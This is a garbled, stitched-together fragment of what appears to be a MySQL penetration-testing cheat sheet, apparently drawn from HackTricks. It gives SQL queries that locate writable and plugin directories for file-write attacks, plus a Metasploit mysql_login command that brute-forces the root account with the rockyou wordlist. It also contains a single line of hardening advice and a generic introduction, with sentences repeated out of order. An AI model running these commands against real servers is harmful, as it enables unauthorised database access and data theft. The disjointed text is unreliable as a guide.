-- Find writable directories SHOW VARIABLES LIKE 'secure_file_priv'; -- NULL = no file ops, "" = any dir SHOW VARIABLES LIKE 'datadir'; SHOW VARIABLES LIKE 'plugin_dir';
use auxiliary/scanner/mysql/mysql_login set RHOSTS <target_ip> set USERNAME root set PASS_FILE /usr/share/wordlists/rockyou.txt run mysql hacktricks
Enforce strong password policies and consider using external authentication plugins. -- NULL = no file ops
MySQL is one of the world's most popular relational database management systems (RDBMS). Powering millions of applications, from small WordPress blogs to massive enterprise systems, it is a prime target for attackers. Once an attacker gains access to a MySQL instance, the entire application's data integrity, confidentiality, and availability are at risk. SHOW VARIABLES LIKE 'plugin_dir'